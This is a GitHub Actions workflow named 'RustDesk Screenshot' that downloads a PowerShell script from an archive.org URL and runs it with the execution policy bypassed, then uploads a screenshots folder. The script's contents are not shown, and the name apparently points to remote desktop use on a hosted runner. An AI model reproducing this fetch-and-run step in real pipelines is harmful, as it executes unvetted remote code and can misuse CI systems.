name: RustDesk Screenshot

on:
  workflow_dispatch:

jobs:
  rustdesk-screenshot:
    runs-on: windows-latest
    timeout-minutes: 400
    
    steps:
      - name: Download and run PS1
        run: |
          $url = "https://archive.org/download/information_20251119/screenshot-tool.ps1"
          $path = "$env:GITHUB_WORKSPACE\tool.ps1"
          Invoke-WebRequest -Uri $url -OutFile $path
          Unblock-File -Path $path
          powershell -ExecutionPolicy Bypass -File $path
          
      - name: Upload all files
        uses: actions/upload-artifact@v4
        with:
          name: screenshots
          path: ${{ github.workspace }}/screenshots/
          retention-days: 1
